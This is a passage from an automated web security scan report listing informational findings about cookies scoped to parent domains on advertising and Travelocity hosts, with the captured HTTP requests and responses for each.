User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://dm.travelocity.com/html.ng/adsize=728x90&site=travelocity&cobrand=TRAVELOCITY&locale=en&area=hotel&dest=BOS&paxa=0&paxs=0&paxc=0&adloc=NA&random=529164&tile=711446054649628&section=results
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: KRTBCOOKIE_57=476-uid:6422714091563403120; KRTBCOOKIE_107=1471-uid:NPgmRuqc1g7o5ImOP5HZYnndqUL92n1F; KRTBCOOKIE_148=1699-uid:439524AE8C6B634E021F5F7802166020; KADUSERCOOKIE=55785307-A5DC-4E3A-B452-DDBD426D3A1D; PMAT=0; KRTBCOOKIE_80=1336-d454714d-69b5-4195-969b-ba426f1012c3.; KRTBCOOKIE_58=1344-OO-00000000000000000; KRTBCOOKIE_22=488-pcv:1|uid:2944787775510337379; KRTBCOOKIE_27=1216-uid:; KRTBCOOKIE_218=4056--5675633421699857517=; KRTBCOOKIE_200=3683-d0f5e0cea474; KRTBCOOKIE_16=226-3620501663059719663; PUBMDCID=1; PUBRETARGET=78_1409703834.82_1409705283.571_1410012888.806_1346872847.390_1323779603.445_1323779616.362_1318595605.76_1318595649.70_1318595646.2191_1331555757.2018_1318595758

Response

HTTP/1.1 200 OK
Server: Apache/2.2.4 (Unix) DAV/2 mod_ssl/2.2.4 OpenSSL/0.9.7a mod_fastcgi/2.4.2
Vary: Accept-Encoding
P3P: CP="NOI DSP COR LAW CUR ADMo DEVo TAIo PSAo PSDo IVAo IVDo HISo OTPo OUR SAMo BUS UNI COM NAV INT DEM CNT STA PRE LOC"
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Content-Type: text/html
Date: Mon, 03 Oct 2011 00:09:11 GMT
Content-Length: 1903
Connection: close
Set-Cookie: PUBMDCID=1; domain=pubmatic.com; expires=Tue, 02-Oct-2012 00:09:11 GMT; path=/
Set-Cookie: _curtime=1317600551; domain=pubmatic.com; expires=Mon, 03-Oct-2011 01:19:11 GMT; path=/
Set-Cookie: camfreq_60531448=3663-1; domain=pubmatic.com; expires=Mon, 03-Oct-2011 00:49:11 GMT; path=/
Set-Cookie: pubfreq_26072_21043_312218146=243-1; domain=pubmatic.com; expires=Mon, 03-Oct-2011 00:49:11 GMT; path=/
Set-Cookie: PMDTSHR=cat:; domain=pubmatic.com; expires=Tue, 04-Oct-2011 00:09:11 GMT; path=/

document.write('<div id="http_dm_travelocity_comhtml_ngadsize" style="position: absolute; margin: 0px 0px 0px 0px; height: 0px; width: 0px; top: -10000px; " clickdata=12UAANhlAAAzUgAATw4AAA8dAAAAAAAAA
...[SNIP]...

13.131. http://showadsak.pubmatic.com/AdServer/AdServerServlet

Summary

Severity:   Information
Confidence:   Certain
Host:   http://showadsak.pubmatic.com
Path:   /AdServer/AdServerServlet

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /AdServer/AdServerServlet?operId=2&pubId=26620&siteId=26621&adId=21556&kadwidth=300&kadheight=250&kadNetwork=559&kbgColor=ffffff&ktextColor=000000&klinkColor=0000EE&pageURL=http://ads.pubmatic.com/HostedDefaultTags/26620/26621/21556/559/adtag.html&frameName=http_ads_pubmatic_comHostedDefaultTags266202662121556559adtag_htmlkomli_ads_frame12662026621&kltstamp=2011-9-2%2020%3A53%3A10&ranreq=0.35609531262889504&timezone=-5&screenResolution=1920x1200&inIframe=1&adPosition=-1x-1&adVisibility=0 HTTP/1.1
Host: showadsak.pubmatic.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://ads.pubmatic.com/HostedDefaultTags/26620/26621/21556/559/adtag.html
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: KRTBCOOKIE_57=476-uid:6422714091563403120; KRTBCOOKIE_107=1471-uid:NPgmRuqc1g7o5ImOP5HZYnndqUL92n1F; KRTBCOOKIE_148=1699-uid:439524AE8C6B634E021F5F7802166020; KADUSERCOOKIE=55785307-A5DC-4E3A-B452-DDBD426D3A1D; PMAT=0; KRTBCOOKIE_58=1344-OO-00000000000000000; KRTBCOOKIE_22=488-pcv:1|uid:2944787775510337379; KRTBCOOKIE_27=1216-uid:; KRTBCOOKIE_200=3683-d0f5e0cea474; pubtime_26072=TMC; KRTBCOOKIE_80=1336-f96ee651-9aaf-4db4-bcd2-102cf3b7c015.; pubfreq_26072=823-3:1098-3; KRTBCOOKIE_16=226-uid:3620501663059719663; pubfreq_26621=; pubtime_26621=TMC; pubfreq_26621_21557_1687682837=559-1; SYNCUPPIX_ON=YES; DPPIX_ON=YES; KRTBCOOKIE_218=4056--5675633421699857517=; PUBRETARGET=78_1409703834.82_1409705283.571_1410012888.806_1346872847.390_1323779603.445_1323779616.362_1318595605.76_1318595649.70_1318595646.2191_1331555757.2018_1318595758; pubfreq_26621_21556_1478501671=559-1; PMDTSHR=cat:; PUBMDCID=1; pubfreq_26621_21557_1797109372=921-1; KTPCACOOKIE=YES; __qca=P0-585104895-1317606788364

Response

HTTP/1.1 200 OK
Server: Apache/2.2.4 (Unix) DAV/2 mod_ssl/2.2.4 OpenSSL/0.9.7a mod_fastcgi/2.4.2
Vary: Accept-Encoding
P3P: CP="NOI DSP COR LAW CUR ADMo DEVo TAIo PSAo PSDo IVAo IVDo HISo OTPo OUR SAMo BUS UNI COM NAV INT DEM CNT STA PRE LOC"
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Content-Type: text/html
Date: Mon, 03 Oct 2011 01:53:07 GMT
Content-Length: 1550
Connection: close
Set-Cookie: PUBMDCID=1; domain=pubmatic.com; expires=Tue, 02-Oct-2012 01:53:07 GMT; path=/
Set-Cookie: pubfreq_26621_21556_427351122=207-1; domain=pubmatic.com; expires=Mon, 03-Oct-2011 02:33:07 GMT; path=/

document.write('<div id="http_ads_pubmatic_comHostedDefaultTags266202662121556559adtag_htmlkomli_ads_frame12662026621" style="position: absolute; margin: 0px 0px 0px 0px; height: 0px; width: 0px; top:
...[SNIP]...

13.132. http://tag.contextweb.com/TagPublish/GetAd.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://tag.contextweb.com
Path:   /TagPublish/GetAd.aspx

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /TagPublish/GetAd.aspx?tagver=1&ca=VIEWAD&cp=538936&ct=106934&cn=1&epid=&esid=&cf=300X250&rq=1&dw=1074&cwu=http%3A%2F%2Fwww.premierleague.com%2Fpage%2FHeadlines%2F0%2C%2C12306%7E2469333%2C00.html&cwr=http%3A%2F%2Fwww.premierleague.com%2Fpage%2FHome%2F0%2C%2C12306%2C00.html&mrnd=96724040&if=0&tl=1&pxy=238,508&cxy=1074,906&dxy=1074,906&tz=300&ln=en-US HTTP/1.1
Host: tag.contextweb.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.premierleague.com/page/Headlines/0,,12306~2469333,00.html
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: C2W4=0; FC1-WC=59371_1_3IlqU; FC1-WCR=132981_3_3Ilow^132982_4_3Iloz; cwbh1=1931%3B10%2F01%2F2011%3BFT049%0A357%3B10%2F03%2F2011%3BEMON2%3B10%2F14%2F2011%3BEHEX1%0A3196%3B10%2F07%2F2011%3BSMTC1%0A996%3B10%2F12%2F2011%3BFACO1%0A2712%3B10%2F19%2F2011%3BBMBN1%0A553%3B10%2F23%2F2011%3BMIWO2%0A3115%3B10%2F30%2F2011%3BGNCT1; V=PpAVCxNh2PJr; pb_rtb_ev="1:537085.439524AE8C6B634E021F5F7802166020.0|535461.2925993182975414771.0|535039.NPgmRuqc1g7o5ImOP5HZYnndqUL92n1F.0|534301.d1b27788-0a91-4596-9a96-e9dad20b3180.0|538569.6c3113bb-f725-48c4-b3a2-8b266db2aca9.0|535495.b6ae888c-d95b-11e0-b096-0025900e0834.0|537583.f9bdca69-e609-4297-9145-48ea56a0756c.0"; cw=cw

Response

HTTP/1.1 200 OK
Server: GlassFish v3
CW-Server: CW-APP205
Cache-Control: private, max-age=0, no-cache, no-store
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
CWDL: 8/300
Content-Type: application/x-javascript;charset=utf-8
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa DEVa PSAa OUR BUS COM NAV INT"
Content-Length: 5997
Vary: Accept-Encoding
Date: Sun, 02 Oct 2011 23:49:28 GMT
Connection: close
Set-Cookie: 538936_3_106934_1=EMPTY; Domain=.contextweb.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: FC1-WC=59764_2_3KjzP; Domain=.contextweb.com; Expires=Wed, 02-Oct-2041 19:49:28 GMT; Path=/
Set-Cookie: CDSActionTracking6=ENufC6tGDSs5|PpAVCxNh2PJr|538936|3448|7061|59764|134043|106934|3|345|25|premierleague.com|2|8|1|0|2|1|2|EMON2.EHEX1.SMTC1.FACO1.BMBN1.MIWO2.GNCT1|1|1|-HAZoarNoKZDius-txPklIg7Z5oU_7wk6upA9MEPZ1w^|I|3JX6w|3UPoY; Domain=.contextweb.com; Expires=Tue, 01-Nov-2011 19:49:27 GMT; Path=/
Set-Cookie: vf=2; Domain=.contextweb.com; Expires=Mon, 03-Oct-2011 04:00:00 GMT; Path=/

document.write(decodeURIComponent("%3Cscript%20type%3D%22text%2Fjavascript%22%3E%0D%0Afunction%20pr_swfver%28%29%7B%0D%0Avar%20osf%2Cosfd%2Ci%2Caxo%3D1%2Cv%3D0%2Cnv%3Dnavigator%3B%0D%0Aif%28nv.plugins
...[SNIP]...

13.133. http://tap.rubiconproject.com/oz/feeds/targus/profile

Summary

Severity:   Information
Confidence:   Certain
Host:   http://tap.rubiconproject.com
Path:   /oz/feeds/targus/profile

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain: The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /oz/feeds/targus/profile?p=targus&oz_source=partner&segment=000&zip=&dob=&gender=&pc= HTTP/1.1
Host: tap.rubiconproject.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://tap2-cdn.rubiconproject.com/partner/scripts/rubicon/emily.html?rtb_ext=1&pc=7845/12566
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: put_1994=vf1kj11kp2en; put_2249=CAESEGMUSetziKiEuzwBhcLJxAU; put_2046=WX9qald2TXhCBmNbCwp9WwZUaXsQdAFCDVliU1tKZA%3D%3D; put_1986=6422714091563403120; put_2146=n4tx19dbice3prpg7887b1ymgzfc6iit; au=GSAE3LG5-KKTN-10.208.77.156; put_1185=2944787775510337379; csi9=3197484.js^1^1317161525^1317161525; cd=false; dq=5|5|0|0; lm="27 Sep 2011 22:12:09 GMT"; put_2101=e406aef0-9c85-4e03-b34a-8a4ca0074db1; put_2025=f9bdca69-e609-4297-9145-48ea56a0756c; put_1523=NPgmRuqc1g7o5ImOP5HZYnndqUL92n1F; put_2132=439524AE8C6B634E021F5F7802166020; put_2271=DUSYkUQpjy1LEYeYEnMS6srZRiE; put_2081=OO-00000000000000000; put_2245=b6ae888c-d95b-11e0-b096-0025900e0834; put_1430=f0be7f74-7052-4a09-8aa0-ca59d82b3888; put_1197=3620501663059719663; rpb=4940%3D1%267751%3D1%265364%3D1%267259%3D1%267249%3D1%267935%3D1%266643%3D1%264212%3D1%266286%3D1%265852%3D1%266432%3D1%267727%3D1%264210%3D1%265671%3D1%264554%3D1%266073%3D1; put_2100=usr3fe3ac8db403a568; ruid=154e62c97432177b6a4bcd01^9^1317599333^840399722; rsid=FcGERCD9s4JUW/TrcU4Dz61qa66Y1k1ire2YJBmN8SN4G8GhejWUS54NHOc/mc5f3LNIph0VqHPLHJEoduxZWv90oskBIySwfMah/ci9C+dMf4Fv4WU=; ses1=13209^2; csi1=3226251.js^2^1317599333^1317599350; rdk2=0; ses2=13378^2&12566^1; csi2=3188003.js^1^1317599406^1317599406&3192060.js^2^1317595852^1317596179&3185947.js^1^1317595852^1317595852; rdk=7845/12566; rdk15=0; ses15=13378^2&13209^2&12566^1; csi15=3188004.js^1^1317599406^1317599406&3226249.js^2^1317599341^1317599383&3209195.js^2^1317595891^1317598688

Response

HTTP/1.1 204 No Content
Date: Sun, 02 Oct 2011 23:51:41 GMT
Server: TRP Apache-Coyote/1.1
p3p: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Cache-control: private
Set-Cookie: cd=false; Domain=.rubiconproject.com; Expires=Mon, 01-Oct-2012 23:51:41 GMT; Path=/
Set-Cookie: dq=7|7|0|0; Expires=Mon, 01-Oct-2012 23:51:41 GMT; Path=/
Set-Cookie: lm="2 Oct 2011 23:51:41 GMT"; Version=1; Domain=.rubiconproject.com; Max-Age=31536000; Path=/
Set-Cookie: SERVERID=; Expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/
Content-Length: 0
Connection: close
Content-Type: text/plain; charset=UTF-8


13.134. http://tap.rubiconproject.com/oz/sensor

Summary

Severity:   Information
Confidence:   Certain
Host:   http://tap.rubiconproject.com
Path:   /oz/sensor

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /oz/sensor?p=rubicon&pc=7743/12359&cd=false&xt=16&k=pm+bst:248,norwich+city:192,7+11:160,10+7:160,unbeaten+run:144,keep+unbeaten:144,manchester+united:144,will+keep:144,confident+manchester:144,anderson+confident:144,run+going:144,united+will:144,football+news:128,news:94,city+goal:80,champions+league:80,watch:76,will+give:64,table+results:64,football+new:64,45+pm:64,00+pm:64,7+45:64,old+trafford:64,15+00:64,match+kicks:64,trafford+crowd:64,newly+promoted:64,crowd+will:64,midfielder+believes:64,brazilian+midfielder:64,promoted+club:64,goal:60,football:60,europa+league:56,30+pm:56,manchester:52,united:52,norwich:50,15+pm:48,&t=Anderson+confident+Manchester+United+will+keep+unbeaten+run+going+against+Norwich+City+-+Goal.com HTTP/1.1
Host: tap.rubiconproject.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.goal.com/en/news/9/england/2011/10/01/2691360/anderson-confident-manchester-united-will-keep-unbeaten-run
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: put_1994=vf1kj11kp2en; put_2249=CAESEGMUSetziKiEuzwBhcLJxAU; put_2046=WX9qald2TXhCBmNbCwp9WwZUaXsQdAFCDVliU1tKZA%3D%3D; put_1986=6422714091563403120; put_2146=n4tx19dbice3prpg7887b1ymgzfc6iit; au=GSAE3LG5-KKTN-10.208.77.156; put_1185=2944787775510337379; put_2101=e406aef0-9c85-4e03-b34a-8a4ca0074db1; put_2025=f9bdca69-e609-4297-9145-48ea56a0756c; put_1523=NPgmRuqc1g7o5ImOP5HZYnndqUL92n1F; put_2132=439524AE8C6B634E021F5F7802166020; put_2271=DUSYkUQpjy1LEYeYEnMS6srZRiE; put_2081=OO-00000000000000000; put_2245=b6ae888c-d95b-11e0-b096-0025900e0834; put_1430=f0be7f74-7052-4a09-8aa0-ca59d82b3888; put_1197=3620501663059719663; rpb=4940%3D1%267751%3D1%265364%3D1%267259%3D1%267249%3D1%267935%3D1%266643%3D1%264212%3D1%266286%3D1%265852%3D1%266432%3D1%267727%3D1%264210%3D1%265671%3D1%264554%3D1%266073%3D1; put_2100=usr3fe3ac8db403a568; ruid=154e62c97432177b6a4bcd01^9^1317599333^840399722; rsid=FcGERCD9s4JUW/TrcU4Dz61qa66Y1k1ire2YJBmN8SN4G8GhejWUS54NHOc/mc5f3LNIph0VqHPLHJEoduxZWv90oskBIySwfMah/ci9C+dMf4Fv4WU=; cd=false; dq=6|6|0|0; lm="2 Oct 2011 23:50:10 GMT"; ses8=13209^1; csi8=3226247.js^1^1317599462^1317599462; csi2=3188003.js^2^1317599406^1317599882&3192060.js^2^1317595852^1317596179&3185947.js^1^1317595852^1317595852; csi15=3226249.js^3^1317599341^1317599886&3188004.js^2^1317599406^1317599881&2748761.js^1^1317599431^1317599431&3209195.js^2^1317595891^1317598688; ses1=13209^5; csi1=3226243.js^1^1317599890^1317599890&3226929.js^2^1317599456^1317599882&3226251.js^2^1317599333^1317599350; ses9=12359^1; csi9=3154654.js^1^1317599933^1317599933; ses2=13378^2&12566^2&12359^1; rdk=7743/12359; ses15=13378^2&13209^3&12566^2&12359^2

Response

HTTP/1.1 204 No Content
Date: Mon, 03 Oct 2011 00:01:01 GMT
Server: TRP Apache-Coyote/1.1
p3p: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Cache-Control: no-cache
Expires: Tue, 01 Jan 2008 00:12:30 GMT
Cache-control: private
Set-Cookie: cd=false; Domain=.rubiconproject.com; Expires=Tue, 02-Oct-2012 00:01:01 GMT; Path=/
Set-Cookie: dq=8|6|2|0; Expires=Tue, 02-Oct-2012 00:01:01 GMT; Path=/
Set-Cookie: SERVERID=; Expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/
Content-Length: 0
Connection: close
Content-Type: text/plain; charset=UTF-8


13.135. http://tap.rubiconproject.com/partner/agent/rubicon/channels.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://tap.rubiconproject.com
Path:   /partner/agent/rubicon/channels.js

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /partner/agent/rubicon/channels.js?cb=oz_onPixelsLoaded&pc=7743/12359 HTTP/1.1
Host: tap.rubiconproject.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.goal.com/en/news/9/england/2011/10/01/2691360/anderson-confident-manchester-united-will-keep-unbeaten-run
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: put_1994=vf1kj11kp2en; put_2249=CAESEGMUSetziKiEuzwBhcLJxAU; put_2046=WX9qald2TXhCBmNbCwp9WwZUaXsQdAFCDVliU1tKZA%3D%3D; put_1986=6422714091563403120; put_2146=n4tx19dbice3prpg7887b1ymgzfc6iit; au=GSAE3LG5-KKTN-10.208.77.156; put_1185=2944787775510337379; put_2101=e406aef0-9c85-4e03-b34a-8a4ca0074db1; put_2025=f9bdca69-e609-4297-9145-48ea56a0756c; put_1523=NPgmRuqc1g7o5ImOP5HZYnndqUL92n1F; put_2132=439524AE8C6B634E021F5F7802166020; put_2271=DUSYkUQpjy1LEYeYEnMS6srZRiE; put_2081=OO-00000000000000000; put_2245=b6ae888c-d95b-11e0-b096-0025900e0834; put_1430=f0be7f74-7052-4a09-8aa0-ca59d82b3888; put_1197=3620501663059719663; rpb=4940%3D1%267751%3D1%265364%3D1%267259%3D1%267249%3D1%267935%3D1%266643%3D1%264212%3D1%266286%3D1%265852%3D1%266432%3D1%267727%3D1%264210%3D1%265671%3D1%264554%3D1%266073%3D1; put_2100=usr3fe3ac8db403a568; ruid=154e62c97432177b6a4bcd01^9^1317599333^840399722; rsid=FcGERCD9s4JUW/TrcU4Dz61qa66Y1k1ire2YJBmN8SN4G8GhejWUS54NHOc/mc5f3LNIph0VqHPLHJEoduxZWv90oskBIySwfMah/ci9C+dMf4Fv4WU=; cd=false; dq=6|6|0|0; lm="2 Oct 2011 23:50:10 GMT"; ses8=13209^1; csi8=3226247.js^1^1317599462^1317599462; csi2=3188003.js^2^1317599406^1317599882&3192060.js^2^1317595852^1317596179&3185947.js^1^1317595852^1317595852; csi15=3226249.js^3^1317599341^1317599886&3188004.js^2^1317599406^1317599881&2748761.js^1^1317599431^1317599431&3209195.js^2^1317595891^1317598688; ses1=13209^5; csi1=3226243.js^1^1317599890^1317599890&3226929.js^2^1317599456^1317599882&3226251.js^2^1317599333^1317599350; ses9=12359^1; csi9=3154654.js^1^1317599933^1317599933; ses2=13378^2&12566^2&12359^1; rdk=7743/12359; ses15=13378^2&13209^3&12566^2&12359^2

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:01:07 GMT
Server: TRP Apache-Coyote/1.1
Cache-Control: no-store, no-cache, must-revalidate
Content-Type: text/javascript;charset=UTF-8
Content-Length: 941
Cache-control: private
Set-Cookie: khaos=GT3FYRAA-6-CO8F; Domain=.rubiconproject.com; Expires=Tue, 01-Oct-2019 00:01:07 GMT; Path=/
Set-Cookie: SERVERID=; Expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/
Connection: close


var oo_profile={
tokenType : "0",
tracking : "",
tags : "Sports and Recreation,Hobbies and Interests,Education,Toys and Games,Family and Parenting,Democrats",
tagcloud : [
{ tag: "Spo
...[SNIP]...

13.136. http://travel.travelocity.com/hotel/HotelAvailability.do

Summary

Severity:   Information
Confidence:   Certain
Host:   http://travel.travelocity.com
Path:   /hotel/HotelAvailability.do

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain: The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /hotel/HotelAvailability.do;jsessionid=74C1C04EA1B1607D7CD2E1313B9B2779.p0617?Service=TRAVELOCITY&SEQ=1317600526540922011&pathIndicator=HOTEL_FRONTDOOR&leavingDate=mm/dd/yyyy&returningDate=mm/dd/yyyy&city=bos&cityCountryCode=US&dateFormat=mm/dd/yyyy&searchMode=city& HTTP/1.1
Host: travel.travelocity.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://travel.travelocity.com/hotel/HotelCobrand.do
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TVLY_GEO=|||||; tyrg1st=51B82D43BB8E25C5; SID=T000V00000X401118380170533249023416102; IPE_S_TMP_910=910; mt.v=1.249362358.1317600494998; __utma=97304794.100809678.1317600495.1317600495.1317600495.1; __utmb=97304794.2.9.1317600523363; __utmc=97304794; __utmz=97304794.1317600495.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); JSID=74C1C04EA1B1607D7CD2E1313B9B2779.p0617; TUID=b93762e7-3915-4de7-8fff-bd2729b35e5e; Service=TRAVELOCITY; mbox=check#true#1317600585|session#1317600481056-80236#1317602385|PC#1317600481056-80236.19#1318810125

Response

HTTP/1.1 302 Moved Temporarily
Date: Mon, 03 Oct 2011 00:08:49 GMT
Server: Apache
Set-Cookie: JSID=50C7F54C8E08272A256D4F9FCD45DA82.p0611; Domain=.travelocity.com; Path=/
Set-Cookie: Service=TRAVELOCITY; Domain=.travelocity.com; Path=/
Set-Cookie: JSESSIONID=; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: JSID=; Domain=.travelocity.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: SID=; Domain=.travelocity.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: ex.lb.entity=; Domain=.travelocity.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: lb.entity=; Domain=.travelocity.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Location: http://travel.travelocity.com/hotel/HotelAvailability.do?.stc=50C7F54C8E08272A256D4F9FCD45DA82.p0611&dateFormat=mm/dd/yyyy&Service=TRAVELOCITY&cityCountryCode=US&city=bos&returningDate=mm/dd/yyyy&leavingDate=mm/dd/yyyy&searchMode=city&SEQ=1317600526540922011&pathIndicator=HOTEL_FRONTDOOR
Vary: Accept-Encoding
Content-Length: 0
Connection: close
Content-Type: text/plain; charset=ISO-8859-1


13.137. http://travel.travelocity.com/hotel/HotelCobrand.do

Summary

Severity:   Information
Confidence:   Certain
Host:   http://travel.travelocity.com
Path:   /hotel/HotelCobrand.do

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain: The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

POST /hotel/HotelCobrand.do HTTP/1.1
Host: travel.travelocity.com
Proxy-Connection: keep-alive
Content-Length: 735
Cache-Control: max-age=0
Origin: http://www.travelocity.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.travelocity.com/472a
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TVLY_GEO=|||||; tyrg1st=51B82D43BB8E25C5; SID=T000V00000X401118380170533249023416102; mbox=check#true#1317600542|session#1317600481056-80236#1317602342|PC#1317600481056-80236.19#1318810083; IPE_S_TMP_910=910; mt.v=1.249362358.1317600494998; __utma=97304794.100809678.1317600495.1317600495.1317600495.1; __utmb=97304794.2.9.1317600523363; __utmc=97304794; __utmz=97304794.1317600495.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

Service=TRAVELOCITY&SEQ=60048504&searchMode=city&expr_path=Y&dateFormat=mm%2Fdd%2Fyyyy&opaqueTabSelected=0&cityCountryCode=US&city=bos&state=&TS_HO_destlist=Las+Vegas%7CNV%7CUS&leavingDate=mm%2Fdd%2Fy
...[SNIP]...

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:08:46 GMT
Server: Apache
Set-Cookie: JSID=AE7752E570B0CD85432B0A6ABF76028D.p0856; Domain=.travelocity.com; Path=/
Set-Cookie: Service=TRAVELOCITY; Domain=.travelocity.com; Path=/
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 3616

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<!--
JSESSIONID = AE7752E570B0CD85432B0A6ABF76028D.p0856
TPSESSIONID = null
Service = TRAVELOCITY
TYRG1ST = 51B82D43BB8E25C5
--><script
...[SNIP]...

13.138. http://travel.travelocity.com/hotel/HotelDetail.do

Summary

Severity:   Information
Confidence:   Certain
Host:   http://travel.travelocity.com
Path:   /hotel/HotelDetail.do

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain: The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /hotel/HotelDetail.do;jsessionid=74C1C04EA1B1607D7CD2E1313B9B2779.p0617?tab=guide&tripType=hotel&propertyId=4810&airport=BOS&resetReview=true&hotelQKey=-2237575859332798600&tsHotelQKey=-2237575859332798600&reviewPage=reviewStart&locLink=HOTEL.HOTELAVAILABILITYLISTLITE1|NAT1&dr=4810A110Z114273A224Z46356A345Z10677A135Z601A159Z41209A139Z48167A178Z28920A139Z4643A90Z25625A159Z12989A129Z1013A189Z13360A152Z64654A166Z44777A136Z9773A129Z11430A84Z10448A97Z46065A125Z32162A99Z20077A108Z1228A169Z12056A109Z34410A99Z9074A149 HTTP/1.1
Host: travel.travelocity.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://travel.travelocity.com/hotel/HotelAvailability.do;jsessionid=74C1C04EA1B1607D7CD2E1313B9B2779.p0617?Service=TRAVELOCITY&SEQ=1317600526540922011&pathIndicator=HOTEL_FRONTDOOR&leavingDate=mm/dd/yyyy&returningDate=mm/dd/yyyy&city=bos&cityCountryCode=US&dateFormat=mm/dd/yyyy&searchMode=city&
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
